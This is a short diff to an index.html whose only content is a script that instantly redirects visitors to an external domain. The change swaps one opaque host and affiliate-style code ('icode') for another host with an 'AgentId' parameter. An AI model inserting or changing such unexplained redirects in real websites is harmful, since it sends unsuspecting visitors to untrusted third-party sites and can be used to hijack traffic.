--- a/index.html
+++ b/index.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://main.oubo70.com/?icode=593435"
+  window.location.href="https://main.RY803.com/?AgentId=12093240"
 </script>
